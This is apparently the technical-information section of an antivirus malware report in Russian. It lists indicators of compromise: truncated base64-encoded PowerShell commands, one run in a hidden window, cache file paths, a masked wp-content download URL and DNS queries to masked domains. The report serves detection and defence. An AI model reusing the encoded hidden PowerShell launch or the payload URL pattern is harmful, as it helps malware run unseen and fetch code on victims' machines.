Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAUABuAG0AZgBhAHcAcgBlAG0AYQBpACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAE0AbwBqAGwAegB6AG0AYwBiAGYAdAB0ACAAIwA+ACAAJABGAG4AcwBrAHMAbAB4AHcAcQBjAHoAPQAnA...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://te##.devel8.com/wp-content/X76MM/
- DNS ASK to####billiards.ca
- DNS ASK ho####earlane.com
- DNS ASK st####g.noc.com.sg
- DNS ASK te##.devel8.com
- DNS ASK de##l8.com
- DNS ASK ne#.######eticsliteracyproject.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAUABuAG0AZgBhAHcAcgBlAG0AYQBpACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAE0AbwBqAGwAegB6AG0AYwBiAGYAdAB0ACAAIwA+ACAAJABGAG4AcwBrAHMAbAB4AHcAcQBjAHoAPQAnA...' (со скрытым окном)